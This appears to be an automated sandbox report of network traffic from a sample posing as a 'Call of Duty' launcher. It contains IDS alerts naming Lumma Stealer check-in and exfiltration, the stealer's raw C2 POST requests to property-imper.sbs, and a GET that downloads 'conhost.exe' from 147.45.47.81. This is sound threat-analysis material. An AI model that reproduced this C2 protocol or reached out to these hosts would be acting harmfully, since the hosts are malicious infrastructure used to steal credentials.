                                                                                    2024-11-23T15:11:42.741185+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.549705104.21.33.116443TCP
                                                                                    2024-11-23T15:11:42.741185+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549705104.21.33.116443TCP
                                                                                    2024-11-23T15:11:44.427022+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549706104.21.33.116443TCP
                                                                                    2024-11-23T15:11:46.552360+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549707104.21.33.116443TCP
                                                                                    2024-11-23T15:11:48.833057+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549708104.21.33.116443TCP
                                                                                    2024-11-23T15:11:51.369193+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549709104.21.33.116443TCP
                                                                                    2024-11-23T15:11:52.117288+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.549709104.21.33.116443TCP
                                                                                    2024-11-23T15:11:53.832174+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549710104.21.33.116443TCP
                                                                                    2024-11-23T15:11:57.920823+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549715104.21.33.116443TCP
                                                                                    2024-11-23T15:11:58.652710+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549715104.21.33.116443TCP
                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Nov 23, 2024 15:11:38.548849106 CET49704443192.168.2.5104.21.33.116
                                                                                    Nov 23, 2024 15:11:38.548912048 CET44349704104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:38.549089909 CET49704443192.168.2.5104.21.33.116
                                                                                    Nov 23, 2024 15:11:38.550278902 CET49704443192.168.2.5104.21.33.116
                                                                                    Nov 23, 2024 15:11:38.550297022 CET44349704104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:39.821394920 CET44349704104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:39.821460009 CET49704443192.168.2.5104.21.33.116
                                                                                    Nov 23, 2024 15:11:39.928963900 CET49704443192.168.2.5104.21.33.116
                                                                                    Nov 23, 2024 15:11:39.928983927 CET44349704104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:39.929351091 CET44349704104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:39.969199896 CET49704443192.168.2.5104.21.33.116
                                                                                    Nov 23, 2024 15:11:39.991450071 CET49704443192.168.2.5104.21.33.116
                                                                                    Nov 23, 2024 15:11:39.991480112 CET49704443192.168.2.5104.21.33.116
                                                                                    Nov 23, 2024 15:11:39.991561890 CET44349704104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:40.683299065 CET44349704104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:40.683388948 CET44349704104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:40.683459044 CET49704443192.168.2.5104.21.33.116
                                                                                    Nov 23, 2024 15:11:40.685986996 CET49704443192.168.2.5104.21.33.116
                                                                                    Nov 23, 2024 15:11:40.686002970 CET44349704104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:40.686023951 CET49704443192.168.2.5104.21.33.116
                                                                                    Nov 23, 2024 15:11:40.686028957 CET44349704104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:40.730207920 CET49705443192.168.2.5104.21.33.116
                                                                                    Nov 23, 2024 15:11:40.730321884 CET44349705104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:40.730443001 CET49705443192.168.2.5104.21.33.116
                                                                                    Nov 23, 2024 15:11:40.730707884 CET49705443192.168.2.5104.21.33.116
                                                                                    Nov 23, 2024 15:11:40.730751038 CET44349705104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:42.030205011 CET44349705104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:42.030344963 CET49705443192.168.2.5104.21.33.116
                                                                                    Nov 23, 2024 15:11:42.031969070 CET49705443192.168.2.5104.21.33.116
                                                                                    Nov 23, 2024 15:11:42.031996965 CET44349705104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:42.032238960 CET44349705104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:42.033838987 CET49705443192.168.2.5104.21.33.116
                                                                                    Nov 23, 2024 15:11:42.033910990 CET49705443192.168.2.5104.21.33.116
                                                                                    Nov 23, 2024 15:11:42.033934116 CET44349705104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:42.741132021 CET44349705104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:42.741159916 CET44349705104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:42.741178989 CET44349705104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:42.741203070 CET44349705104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:42.741249084 CET49705443192.168.2.5104.21.33.116
                                                                                    Nov 23, 2024 15:11:42.741281033 CET44349705104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:42.741313934 CET44349705104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:42.741324902 CET44349705104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:42.741332054 CET49705443192.168.2.5104.21.33.116
                                                                                    Nov 23, 2024 15:11:42.741374969 CET49705443192.168.2.5104.21.33.116
                                                                                    Nov 23, 2024 15:11:42.741393089 CET44349705104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:42.741476059 CET49705443192.168.2.5104.21.33.116
                                                                                    Nov 23, 2024 15:11:42.749274969 CET44349705104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:42.757728100 CET44349705104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:42.757788897 CET49705443192.168.2.5104.21.33.116
                                                                                    Nov 23, 2024 15:11:42.757801056 CET44349705104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:42.762135029 CET44349705104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:42.762204885 CET49705443192.168.2.5104.21.33.116
                                                                                    Nov 23, 2024 15:11:42.762213945 CET44349705104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:42.802241087 CET49705443192.168.2.5104.21.33.116
                                                                                    Nov 23, 2024 15:11:42.860816956 CET44349705104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:42.903635025 CET49705443192.168.2.5104.21.33.116
                                                                                    Nov 23, 2024 15:11:42.942218065 CET44349705104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:42.942384958 CET44349705104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:42.942449093 CET49705443192.168.2.5104.21.33.116
                                                                                    Nov 23, 2024 15:11:42.942694902 CET49705443192.168.2.5104.21.33.116
                                                                                    Nov 23, 2024 15:11:42.942751884 CET44349705104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:42.942802906 CET49705443192.168.2.5104.21.33.116
                                                                                    Nov 23, 2024 15:11:42.942817926 CET44349705104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:43.103369951 CET49706443192.168.2.5104.21.33.116
                                                                                    Nov 23, 2024 15:11:43.103413105 CET44349706104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:43.103478909 CET49706443192.168.2.5104.21.33.116
                                                                                    Nov 23, 2024 15:11:43.103874922 CET49706443192.168.2.5104.21.33.116
                                                                                    Nov 23, 2024 15:11:43.103888035 CET44349706104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:44.426898003 CET44349706104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:44.427021980 CET49706443192.168.2.5104.21.33.116
                                                                                    Nov 23, 2024 15:11:44.428746939 CET49706443192.168.2.5104.21.33.116
                                                                                    Nov 23, 2024 15:11:44.428755045 CET44349706104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:44.428976059 CET44349706104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:44.430759907 CET49706443192.168.2.5104.21.33.116
                                                                                    Nov 23, 2024 15:11:44.430964947 CET49706443192.168.2.5104.21.33.116
                                                                                    Nov 23, 2024 15:11:44.430993080 CET44349706104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:45.222585917 CET44349706104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:45.222673893 CET44349706104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:45.222743034 CET49706443192.168.2.5104.21.33.116
                                                                                    Nov 23, 2024 15:11:45.222882032 CET49706443192.168.2.5104.21.33.116
                                                                                    Nov 23, 2024 15:11:45.222897053 CET44349706104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:45.338722944 CET49707443192.168.2.5104.21.33.116
                                                                                    Nov 23, 2024 15:11:45.338838100 CET44349707104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:45.338948965 CET49707443192.168.2.5104.21.33.116
                                                                                    Nov 23, 2024 15:11:45.339335918 CET49707443192.168.2.5104.21.33.116
                                                                                    Nov 23, 2024 15:11:45.339365959 CET44349707104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:46.552222013 CET44349707104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:46.552360058 CET49707443192.168.2.5104.21.33.116
                                                                                    Nov 23, 2024 15:11:46.553597927 CET49707443192.168.2.5104.21.33.116
                                                                                    Nov 23, 2024 15:11:46.553613901 CET44349707104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:46.554265022 CET44349707104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:46.555248976 CET49707443192.168.2.5104.21.33.116
                                                                                    Nov 23, 2024 15:11:46.555380106 CET49707443192.168.2.5104.21.33.116
                                                                                    Nov 23, 2024 15:11:46.555447102 CET44349707104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:46.555541992 CET49707443192.168.2.5104.21.33.116
                                                                                    Nov 23, 2024 15:11:46.603354931 CET44349707104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:47.330530882 CET44349707104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:47.330602884 CET44349707104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:47.330674887 CET49707443192.168.2.5104.21.33.116
                                                                                    Nov 23, 2024 15:11:47.330826998 CET49707443192.168.2.5104.21.33.116
                                                                                    Nov 23, 2024 15:11:47.330869913 CET44349707104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:47.620814085 CET49708443192.168.2.5104.21.33.116
                                                                                    Nov 23, 2024 15:11:47.620922089 CET44349708104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:47.621002913 CET49708443192.168.2.5104.21.33.116
                                                                                    Nov 23, 2024 15:11:47.621309042 CET49708443192.168.2.5104.21.33.116
                                                                                    Nov 23, 2024 15:11:47.621345997 CET44349708104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:48.832914114 CET44349708104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:48.833056927 CET49708443192.168.2.5104.21.33.116
                                                                                    Nov 23, 2024 15:11:48.834337950 CET49708443192.168.2.5104.21.33.116
                                                                                    Nov 23, 2024 15:11:48.834350109 CET44349708104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:48.834585905 CET44349708104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:48.836194038 CET49708443192.168.2.5104.21.33.116
                                                                                    Nov 23, 2024 15:11:48.836358070 CET49708443192.168.2.5104.21.33.116
                                                                                    Nov 23, 2024 15:11:48.836401939 CET44349708104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:48.836488962 CET49708443192.168.2.5104.21.33.116
                                                                                    Nov 23, 2024 15:11:48.836505890 CET44349708104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:49.678051949 CET44349708104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:49.678128004 CET44349708104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:49.678193092 CET49708443192.168.2.5104.21.33.116
                                                                                    Nov 23, 2024 15:11:49.678359985 CET49708443192.168.2.5104.21.33.116
                                                                                    Nov 23, 2024 15:11:49.678385019 CET44349708104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:50.063308001 CET49709443192.168.2.5104.21.33.116
                                                                                    Nov 23, 2024 15:11:50.063334942 CET44349709104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:50.063406944 CET49709443192.168.2.5104.21.33.116
                                                                                    Nov 23, 2024 15:11:50.063780069 CET49709443192.168.2.5104.21.33.116
                                                                                    Nov 23, 2024 15:11:50.063797951 CET44349709104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:51.368983984 CET44349709104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:51.369193077 CET49709443192.168.2.5104.21.33.116
                                                                                    Nov 23, 2024 15:11:51.375580072 CET49709443192.168.2.5104.21.33.116
                                                                                    Nov 23, 2024 15:11:51.375591993 CET44349709104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:51.375814915 CET44349709104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:51.377069950 CET49709443192.168.2.5104.21.33.116
                                                                                    Nov 23, 2024 15:11:51.377167940 CET49709443192.168.2.5104.21.33.116
                                                                                    Nov 23, 2024 15:11:51.377172947 CET44349709104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:52.117300987 CET44349709104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:52.117410898 CET44349709104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:52.117465973 CET49709443192.168.2.5104.21.33.116
                                                                                    Nov 23, 2024 15:11:52.117609978 CET49709443192.168.2.5104.21.33.116
                                                                                    Nov 23, 2024 15:11:52.117619991 CET44349709104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:52.569839001 CET49710443192.168.2.5104.21.33.116
                                                                                    Nov 23, 2024 15:11:52.569900036 CET44349710104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:52.570148945 CET49710443192.168.2.5104.21.33.116
                                                                                    Nov 23, 2024 15:11:52.570349932 CET49710443192.168.2.5104.21.33.116
                                                                                    Nov 23, 2024 15:11:52.570384026 CET44349710104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:53.832084894 CET44349710104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:53.832174063 CET49710443192.168.2.5104.21.33.116
                                                                                    Nov 23, 2024 15:11:53.833373070 CET49710443192.168.2.5104.21.33.116
                                                                                    Nov 23, 2024 15:11:53.833404064 CET44349710104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:53.833656073 CET44349710104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:53.839200974 CET49710443192.168.2.5104.21.33.116
                                                                                    Nov 23, 2024 15:11:53.840049028 CET49710443192.168.2.5104.21.33.116
                                                                                    Nov 23, 2024 15:11:53.840097904 CET44349710104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:53.840219021 CET49710443192.168.2.5104.21.33.116
                                                                                    Nov 23, 2024 15:11:53.840266943 CET44349710104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:53.840392113 CET49710443192.168.2.5104.21.33.116
                                                                                    Nov 23, 2024 15:11:53.840442896 CET44349710104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:53.840599060 CET49710443192.168.2.5104.21.33.116
                                                                                    Nov 23, 2024 15:11:53.840660095 CET44349710104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:53.840846062 CET49710443192.168.2.5104.21.33.116
                                                                                    Nov 23, 2024 15:11:53.840903997 CET44349710104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:53.841157913 CET49710443192.168.2.5104.21.33.116
                                                                                    Nov 23, 2024 15:11:53.841206074 CET44349710104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:53.841237068 CET49710443192.168.2.5104.21.33.116
                                                                                    Nov 23, 2024 15:11:53.841264963 CET44349710104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:53.841407061 CET49710443192.168.2.5104.21.33.116
                                                                                    Nov 23, 2024 15:11:53.841445923 CET44349710104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:53.841486931 CET49710443192.168.2.5104.21.33.116
                                                                                    Nov 23, 2024 15:11:53.841577053 CET49710443192.168.2.5104.21.33.116
                                                                                    Nov 23, 2024 15:11:53.841619968 CET49710443192.168.2.5104.21.33.116
                                                                                    Nov 23, 2024 15:11:53.883348942 CET44349710104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:53.883639097 CET49710443192.168.2.5104.21.33.116
                                                                                    Nov 23, 2024 15:11:53.883698940 CET44349710104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:53.883747101 CET49710443192.168.2.5104.21.33.116
                                                                                    Nov 23, 2024 15:11:53.883791924 CET44349710104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:53.883862019 CET49710443192.168.2.5104.21.33.116
                                                                                    Nov 23, 2024 15:11:53.883909941 CET44349710104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:56.671521902 CET44349710104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:56.671633005 CET44349710104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:56.671691895 CET49710443192.168.2.5104.21.33.116
                                                                                    Nov 23, 2024 15:11:56.671955109 CET49710443192.168.2.5104.21.33.116
                                                                                    Nov 23, 2024 15:11:56.671991110 CET44349710104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:56.700735092 CET49715443192.168.2.5104.21.33.116
                                                                                    Nov 23, 2024 15:11:56.700781107 CET44349715104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:56.700853109 CET49715443192.168.2.5104.21.33.116
                                                                                    Nov 23, 2024 15:11:56.701194048 CET49715443192.168.2.5104.21.33.116
                                                                                    Nov 23, 2024 15:11:56.701205969 CET44349715104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:57.920722961 CET44349715104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:57.920823097 CET49715443192.168.2.5104.21.33.116
                                                                                    Nov 23, 2024 15:11:57.922099113 CET49715443192.168.2.5104.21.33.116
                                                                                    Nov 23, 2024 15:11:57.922102928 CET44349715104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:57.922364950 CET44349715104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:57.925497055 CET49715443192.168.2.5104.21.33.116
                                                                                    Nov 23, 2024 15:11:57.925497055 CET49715443192.168.2.5104.21.33.116
                                                                                    Nov 23, 2024 15:11:57.925575018 CET44349715104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:58.652728081 CET44349715104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:58.652827024 CET44349715104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:58.652995110 CET49715443192.168.2.5104.21.33.116
                                                                                    Nov 23, 2024 15:11:58.653081894 CET49715443192.168.2.5104.21.33.116
                                                                                    Nov 23, 2024 15:11:58.653099060 CET44349715104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:58.653112888 CET49715443192.168.2.5104.21.33.116
                                                                                    Nov 23, 2024 15:11:58.653117895 CET44349715104.21.33.116192.168.2.5
                                                                                    Nov 23, 2024 15:11:58.654633045 CET4972380192.168.2.5147.45.47.81
                                                                                    Nov 23, 2024 15:11:58.774991989 CET8049723147.45.47.81192.168.2.5
                                                                                    Nov 23, 2024 15:11:58.775089979 CET4972380192.168.2.5147.45.47.81
                                                                                    Nov 23, 2024 15:11:58.775237083 CET4972380192.168.2.5147.45.47.81
                                                                                    Nov 23, 2024 15:11:58.895246029 CET8049723147.45.47.81192.168.2.5
                                                                                    Nov 23, 2024 15:12:20.676095963 CET8049723147.45.47.81192.168.2.5
                                                                                    Nov 23, 2024 15:12:20.676161051 CET4972380192.168.2.5147.45.47.81
                                                                                    Nov 23, 2024 15:12:20.699867964 CET4972380192.168.2.5147.45.47.81
                                                                                    Nov 23, 2024 15:12:20.819431067 CET8049723147.45.47.81192.168.2.5
                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Nov 23, 2024 15:11:38.400815964 CET5425653192.168.2.51.1.1.1
                                                                                    Nov 23, 2024 15:11:38.542999983 CET53542561.1.1.1192.168.2.5
                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                    Nov 23, 2024 15:11:38.400815964 CET192.168.2.51.1.1.10x6e5dStandard query (0)property-imper.sbsA (IP address)IN (0x0001)false
                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                    Nov 23, 2024 15:11:38.542999983 CET1.1.1.1192.168.2.50x6e5dNo error (0)property-imper.sbs104.21.33.116A (IP address)IN (0x0001)false
                                                                                    Nov 23, 2024 15:11:38.542999983 CET1.1.1.1192.168.2.50x6e5dNo error (0)property-imper.sbs172.67.162.84A (IP address)IN (0x0001)false
                                                                                    • property-imper.sbs
                                                                                    • 147.45.47.81
                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    0192.168.2.549723147.45.47.81804832C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Nov 23, 2024 15:11:58.775237083 CET198OUTGET /conhost.exe HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Host: 147.45.47.81


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    0192.168.2.549704104.21.33.1164434832C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-11-23 14:11:39 UTC265OUTPOST /api HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Content-Length: 8
                                                                                    Host: property-imper.sbs
                                                                                    2024-11-23 14:11:39 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                    Data Ascii: act=life
                                                                                    2024-11-23 14:11:40 UTC1017INHTTP/1.1 200 OK
                                                                                    Date: Sat, 23 Nov 2024 14:11:40 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Set-Cookie: PHPSESSID=deah6j1cf508g1inmmnefk616i; expires=Wed, 19-Mar-2025 07:58:19 GMT; Max-Age=9999999; path=/
                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    cf-cache-status: DYNAMIC
                                                                                    vary: accept-encoding
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mk7%2BACJ4P4KHXD%2Fd4QmhLtSNLMRgNFJ3V7WEJ7oENSnogNXA7yteAZrf3UiF%2FLP60c1icF1BmFVaB5sjximtUjYgfU94PuY23ugBpN3l%2BNAK76ABwDEX6GOnC%2FR1Mbn7Cu0Zsok%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8e71bfeffa5d2365-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1864&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2845&recv_bytes=909&delivery_rate=1607929&cwnd=153&unsent_bytes=0&cid=2d358e37d77e63ea&ts=875&x=0"
                                                                                    2024-11-23 14:11:40 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                    Data Ascii: 2ok
                                                                                    2024-11-23 14:11:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1192.168.2.549705104.21.33.1164434832C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-11-23 14:11:42 UTC266OUTPOST /api HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Content-Length: 51
                                                                                    Host: property-imper.sbs
                                                                                    2024-11-23 14:11:42 UTC51OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 42 56 6e 55 71 6f 2d 2d 40 73 61 73 63 68 6b 61 71 26 6a 3d
                                                                                    Data Ascii: act=recive_message&ver=4.0&lid=BVnUqo--@saschkaq&j=
                                                                                    2024-11-23 14:11:42 UTC1012INHTTP/1.1 200 OK
                                                                                    Date: Sat, 23 Nov 2024 14:11:42 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Set-Cookie: PHPSESSID=agu9f7eskftqiklej6s47catnp; expires=Wed, 19-Mar-2025 07:58:21 GMT; Max-Age=9999999; path=/
                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    cf-cache-status: DYNAMIC
                                                                                    vary: accept-encoding
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9QtKmHfbS0qkp5rUz3zwOI7eoM3D5mcmTt1SAcSiOIROloAWW4q8UeFviwgFPQcXRxnoGMVbD1s%2Fui5Yo2ONP1b8gC8a0PAJ9bnFxKl4tCwNbEnowLmq%2BnpGUm8gYSpr3lGSuqs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8e71bffd6df84391-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=12400&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=953&delivery_rate=1625835&cwnd=236&unsent_bytes=0&cid=ded558ab5cfb701a&ts=718&x=0"
                                                                                    2024-11-23 14:11:42 UTC357INData Raw: 31 64 39 33 0d 0a 53 33 4f 59 4c 65 66 61 56 56 35 69 36 36 74 6c 30 4a 58 49 73 72 32 5a 43 6d 72 4f 57 34 42 34 78 6b 2b 44 6b 64 49 71 66 31 41 77 55 65 34 50 33 65 35 35 66 42 47 4f 69 56 2b 6b 35 37 33 58 6b 62 74 72 44 75 78 68 35 68 6d 71 50 4f 61 39 38 46 77 53 63 6e 45 56 2b 55 47 55 76 33 6c 38 42 35 4f 4a 58 34 76 75 36 74 66 54 75 7a 42 49 71 7a 48 69 47 61 6f 74 34 76 71 39 57 68 4d 7a 49 78 2f 2f 52 59 4b 35 4d 54 38 4f 68 73 34 41 74 66 53 69 33 4e 54 30 59 67 66 73 64 36 49 64 76 47 32 35 73 35 39 50 43 7a 45 47 45 75 74 47 78 61 64 35 4a 55 43 4f 78 55 66 71 74 36 6e 58 33 2f 56 73 44 71 55 7a 36 42 43 69 4c 4f 66 37 6f 6b 4d 5a 4f 43 4d 52 2f 45 53 49 73 43 55 79 42 49 48 46 42 72 2f 30 36 70 36 66 2f 48 42 49 39 48 6d 78 4b 4b 63 38 38
                                                                                    Data Ascii: 1d93S3OYLefaVV5i66tl0JXIsr2ZCmrOW4B4xk+DkdIqf1AwUe4P3e55fBGOiV+k573XkbtrDuxh5hmqPOa98FwScnEV+UGUv3l8B5OJX4vu6tfTuzBIqzHiGaot4vq9WhMzIx//RYK5MT8Ohs4AtfSi3NT0Ygfsd6IdvG25s59PCzEGEutGxad5JUCOxUfqt6nX3/VsDqUz6BCiLOf7okMZOCMR/ESIsCUyBIHFBr/06p6f/HBI9HmxKKc88
